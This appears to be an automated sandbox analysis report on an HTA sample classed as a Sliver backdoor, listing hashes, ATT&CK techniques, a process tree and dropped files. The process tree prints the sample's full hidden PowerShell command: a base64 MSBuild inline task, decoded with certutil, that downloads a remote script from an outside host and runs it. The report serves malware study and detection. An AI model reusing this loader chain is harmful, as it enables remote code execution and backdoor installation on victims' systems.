sliver | 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Analysis

max time kernel
148s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
Size

3KB
MD5

f46e78d3864aae68f2b8e83af27b9cf3
SHA1

51d75c93a4d06327f172d41c797ecc99a8ba309a
SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
SHA512

e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/952-95-0x00000281AAA50000-0x00000281AB4CB000-memory.dmp	SliverRAT_v2
behavioral2/memory/952-96-0x00000281ABF50000-0x00000281ACA34000-memory.dmp	SliverRAT_v2
behavioral2/memory/952-98-0x00000281ABF50000-0x00000281ACA34000-memory.dmp	SliverRAT_v2
behavioral2/memory/952-97-0x00000281ABF50000-0x00000281ACA34000-memory.dmp	SliverRAT_v2
behavioral2/memory/952-99-0x00000281ABF50000-0x00000281ACA34000-memory.dmp	SliverRAT_v2
behavioral2/memory/952-100-0x00000281ABF50000-0x00000281ACA34000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3520	powershell.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

certutil.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
1424	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.execertutil.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exemsbuild.exe

pid	Process
3520	powershell.exe
3520	powershell.exe
952	msbuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemsbuild.exe

description	pid	Process
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	952	msbuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

mshta.exepowershell.exemsbuild.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 1908 wrote to memory of 3520	1908	mshta.exe	86
PID 1908 wrote to memory of 3520	1908	mshta.exe	86
PID 1908 wrote to memory of 3520	1908	mshta.exe	86
PID 3520 wrote to memory of 1424	3520	powershell.exe	88
PID 3520 wrote to memory of 1424	3520	powershell.exe	88
PID 3520 wrote to memory of 1424	3520	powershell.exe	88
PID 3520 wrote to memory of 952	3520	powershell.exe	89
PID 3520 wrote to memory of 952	3520	powershell.exe	89
PID 952 wrote to memory of 3036	952	msbuild.exe	92
PID 952 wrote to memory of 3036	952	msbuild.exe	92
PID 3036 wrote to memory of 4876	3036	csc.exe	93
PID 3036 wrote to memory of 4876	3036	csc.exe	93
PID 952 wrote to memory of 2056	952	msbuild.exe	94
PID 952 wrote to memory of 2056	952	msbuild.exe	94
PID 2056 wrote to memory of 3988	2056	csc.exe	95
PID 2056 wrote to memory of 3988	2056	csc.exe	95
PID 952 wrote to memory of 2136	952	msbuild.exe	98
PID 952 wrote to memory of 2136	952	msbuild.exe	98
PID 2136 wrote to memory of 1616	2136	csc.exe	99
PID 2136 wrote to memory of 1616	2136	csc.exe	99

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\SysWOW64\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
    3⤵
    - Manipulates Digital Signatures
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:1424
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3036
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA103.tmp" "c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP"
        5⤵
        
        PID:4876
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp" "c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP"
        5⤵
        
        PID:3988
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2136
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP"
        5⤵
        
        PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA103.tmp

Filesize
1KB

MD5
4fb06109536fb966fc7fe48a4e4c73c5

SHA1
cb634c5aa3ac6d2b3c6dd35921e4c0e312db3012

SHA256
018a3672621a1507f13dd3b1c0b17ee3c580cd6b4f419d16d307f2023b431e9e

SHA512
dedc4370055f51785c20f07495500f3d4f998f71884c1379a619ab1427f73abca7603b74dc234fbdc273420f177583537060dfd364c1916170f8cc3930a0fab0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp

Filesize
1KB

MD5
dd7867673e51ebb41d610f11e45354b7

SHA1
7f800b2b6ea4bc69174d9536db0fe2a3bdaf2906

SHA256
a0dadca789337649ca394bfd993d0e8a49e2c19b4c50d3ffbbb4b7c1a2471a87

SHA512
1da21919dd82c800e6becdec76c15d2d2420312c4656ae2518c6e395563e109dd9079ba49f4344393d87042642c31276e1e8a854663982061baabb470fdd3a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp

Filesize
1KB

MD5
047b10848fde47eb76ac13ded734bab4

SHA1
256fcb53bdb0fe874a1c587d68140c9c2fd9497a

SHA256
1b9c0e6949060a80ff379a0e0c58a1b5a959305156a886af3478071f8a662be9

SHA512
ce7e64cd728062e0fe9d780463f4efb6f1ad0cf0938e3ddb976f9147031a3f5df450dc60c89ce6158b85d552b502c278c218af9db4079156b3933a591272cdf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_damg5dxo.rm5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.dll

Filesize
4KB

MD5
de3baa1652d6817ba41024c8996de901

SHA1
923c8476f795cb27dbfd8cb627fc7b3975a40212

SHA256
f251611b3d76e57616e1f80c7ec49920bbff294bef9006cbde133868d6c64040

SHA512
a03a0a1aa86b6d4162b253664fbe2f185bca424e145ff3fd1963d06c5851bb9448004464f55c4ce55d1163fbe137efc0d1b1b4c19ac84f91be89c2fc09ab67bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.pdb

Filesize
11KB

MD5
57a23f93864adaf79e7eefed41a39ff0

SHA1
5a2250258e1e2f8dbe66ecbfc1b7b753f6bc235b

SHA256
e4b55cfa35a1c121f674ce3b8518f2aead81e7591a137ff288b4f74be7222f0d

SHA512
af5b9867a06367baccbb4fa69825354835d6934b2f929f006444ddb67c06b4e9d84b1aae1dabf83069b9b82502d2c680b4fb87a785c4e0791a723e4e9e0b0e37

Download Submit
C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.dll

Filesize
3KB

MD5
fb0cb1c8d9d20770fe532b409454b79f

SHA1
5bf38c6ba400f4ec1dc0f1b5da959a21cf537c57

SHA256
0e4995b295c2c086fb5a49cadb1448a5dcdf7b8697f97f505a2c0a16665e734f

SHA512
1bae49309ccd0a9f74bd1d8ca939f5cb3ced9c45fe67beaab085c7b13183cabbccd1f88ce8d96f07d17d93e10b53b15b237bd137f130d03a94422df789da798b

Download Submit
C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.dll

Filesize
4KB

MD5
21fc6aeefeb46ee3fac086ae5ce211a0

SHA1
446d2594ab654a6a7e65b689526467fffe9b8834

SHA256
913e46a90ccc162b187f5104d589dc54c0998a023e12d83b8f2a747e4c456802

SHA512
af678b2b0d975396e488d9a27d4f245c85bafbd1a4653e7203fe00f4fdff0548e9363f863b1c4d1346c62365f6fabe206f8f4f7505dc385b80ec30cf20fe122c

Download Submit
C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.pdb

Filesize
11KB

MD5
e82c8d8eb2bfb54e55ece546f457ba30

SHA1
de6962a4c0384a557a45c22acfa341d1cdd05a36

SHA256
cdf9dadd3895b7f874fef2d898b07e5f505a534fdd9084303a9226f0f77b9898

SHA512
5f0efbc794be8b0301363c3b2c30d15aec056d5801ffedfa612a1699d5b2abe0631d86b0a1ce7dd3748bbc9576d1ef7cd919264f1a0de29146f59a7c3f2bbe32

Download Submit
C:\windows\temp\d.xml

Filesize
2KB

MD5
6c2a8d820d8d80182aacdc125399cd71

SHA1
51ccd1e0c3247bf24da813a1f660a367f8deefc8

SHA256
104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

SHA512
c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP

Filesize
652B

MD5
4799bda01f5880c4a0dee36f67c0be86

SHA1
fe89492a52a776ebaeac29c163023a50058675b6

SHA256
3a1297f629a098ea3771944607932a60502995298531fb312c30a4e8ec9b4cd9

SHA512
4cdc430768375c3b870f3ace8ad3b9c32e53eebe5380213f55e897b679abacd547daee75e0674b5b010defc052577720161ee37fe9031a106a835d35113fe4b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.0.cs

Filesize
1KB

MD5
4a4ff4a5e71cabe4864c862a697c1e27

SHA1
b95fb7438213c3ae9caf0e8b52bb301fefcddb56

SHA256
70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

SHA512
7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline

Filesize
660B

MD5
b79b214e3b34c9588406593165569bff

SHA1
4116df0d654742517d69a8132f801e4688ebb26d

SHA256
9a1432b68f86e146f144f06206b3c9e06a677d7b52df4aaa310aff52cb76d03f

SHA512
11d7766e224ee9e942a06a65023e1976de7604d4724f1236d14b69281778e20afab567207eebb0f45f3bde8c53661baba2a439292b456e5a220db7f973df1ce5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP

Filesize
652B

MD5
c539223eff9f6a5ebbd73f7d4a1dab74

SHA1
a4c1f35cc92829c1c84ce2c22f17a75490353040

SHA256
a3cc88b9d10aa7290a009cfc3a0d70d87a12b129d78432447cbb4a663244932f

SHA512
955bc58410de5762fa2419c4c574648417b4e2e5c0e0aa51ece48501d0f47768f8e45e77a5f62ed32c1619a5c340165c7bff4726c20df8ebe822853c66c0e936

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.0.cs

Filesize
611B

MD5
9dc0e32c32d7b3cfd2f819d8c0e4c7a5

SHA1
267cb8f96e02e298033786efd8ee6d87a73418a3

SHA256
67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

SHA512
c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline

Filesize
369B

MD5
04c6f1e77ed254f3f584bb7d8b606404

SHA1
b4fa38bbd3dd3b217809864c0828f31355088655

SHA256
8c875cf738bf775fa8e3d1fe21e624d6e856a47bd060b564a73750d4783440db

SHA512
becdded8061fa3893c06fc10a5b02c72beca945dd1b8cdb30c48c82c9bef5a1600f78f33b78ef6e7a0e70647126c13097ab211f9b55000ee287cfa92cb2b6c89

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP

Filesize
652B

MD5
d747f845e0479d73806181e4ffd65502

SHA1
4ea4786d121256d1554fde6b540567a02be26ad8

SHA256
9e38db25e91b461a7191f87c4e1b41ce5266da42f82436669495e0c5e86b40f9

SHA512
57d62fe4501202f31b0ec94d11a40306f40a7ec0c708452d09055c51e6161048a49a63ce080443024a0bfcd7f98d24f7134688a21b1b97b4e4bb2e27c1709a51

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.0.cs

Filesize
1KB

MD5
da1f4b7b1a87cc475dfa05923b6301a0

SHA1
0e2ff764c519bc8169b66437857f01e25676e343

SHA256
624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

SHA512
d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline

Filesize
801B

MD5
93f61be44f885540c24a3ba21fc93054

SHA1
aaf9089f5c09ca69e142fceb092eaa231432ad5e

SHA256
ba1cdc0c60624fea02bc85a952474a69c93a4c408a92fbbd6f46ca076885f681

SHA512
d1685bbecf2e060f3a74db65683d233a71c7851527a766207cf4250425b2a47733b760380e1ad15fcdc05cb0a2be9334cbaceb094bcb9d986d755c49bacb01e4

Download Submit
\??\c:\windows\temp\enc3.txt

Filesize
6KB

MD5
940ed0fa0b1fc8ed6fbf279ab67af56f

SHA1
da4b7c40029542659f025ae74fa0be0fb0fa473c

SHA256
731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

SHA512
934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

Download Submit
memory/952-33-0x00000281A8370000-0x00000281A83B4000-memory.dmp

Filesize
272KB

Download
memory/952-98-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

Filesize
10.9MB

Download
memory/952-34-0x00000281A86B0000-0x00000281A882C000-memory.dmp

Filesize
1.5MB

Download
memory/952-35-0x00000281A8A20000-0x00000281A8D86000-memory.dmp

Filesize
3.4MB

Download
memory/952-32-0x00000281A8450000-0x00000281A8572000-memory.dmp

Filesize
1.1MB

Download
memory/952-28-0x000002818DFE0000-0x000002818DFFA000-memory.dmp

Filesize
104KB

Download
memory/952-100-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

Filesize
10.9MB

Download
memory/952-99-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

Filesize
10.9MB

Download
memory/952-97-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

Filesize
10.9MB

Download
memory/952-77-0x00000281AA820000-0x00000281AA842000-memory.dmp

Filesize
136KB

Download
memory/952-50-0x00000281A8010000-0x00000281A8018000-memory.dmp

Filesize
32KB

Download
memory/952-27-0x000002818DBE0000-0x000002818DC1E000-memory.dmp

Filesize
248KB

Download
memory/952-30-0x00000281A8040000-0x00000281A8070000-memory.dmp

Filesize
192KB

Download
memory/952-29-0x00000281A8170000-0x00000281A82CA000-memory.dmp

Filesize
1.4MB

Download
memory/952-96-0x00000281ABF50000-0x00000281ACA34000-memory.dmp

Filesize
10.9MB

Download
memory/952-95-0x00000281AAA50000-0x00000281AB4CB000-memory.dmp

Filesize
10.5MB

Download
memory/952-90-0x00000281A8320000-0x00000281A8328000-memory.dmp

Filesize
32KB

Download
memory/952-66-0x00000281A8020000-0x00000281A8028000-memory.dmp

Filesize
32KB

Download
memory/3520-23-0x00000000077B0000-0x00000000077CA000-memory.dmp

Filesize
104KB

Download
memory/3520-2-0x000000007424E000-0x000000007424F000-memory.dmp

Filesize
4KB

Download
memory/3520-6-0x0000000074240000-0x00000000749F0000-memory.dmp

Filesize
7.7MB

Download
memory/3520-5-0x0000000005910000-0x0000000005F38000-memory.dmp

Filesize
6.2MB

Download
memory/3520-4-0x0000000074240000-0x00000000749F0000-memory.dmp

Filesize
7.7MB

Download
memory/3520-7-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/3520-3-0x0000000003270000-0x00000000032A6000-memory.dmp

Filesize
216KB

Download
memory/3520-92-0x000000007424E000-0x000000007424F000-memory.dmp

Filesize
4KB

Download
memory/3520-93-0x0000000074240000-0x00000000749F0000-memory.dmp

Filesize
7.7MB

Download
memory/3520-8-0x0000000006030000-0x0000000006096000-memory.dmp

Filesize
408KB

Download
memory/3520-9-0x0000000006110000-0x0000000006176000-memory.dmp

Filesize
408KB

Download
memory/3520-19-0x0000000006180000-0x00000000064D4000-memory.dmp

Filesize
3.3MB

Download
memory/3520-20-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/3520-21-0x00000000067B0000-0x00000000067FC000-memory.dmp

Filesize
304KB

Download
memory/3520-22-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download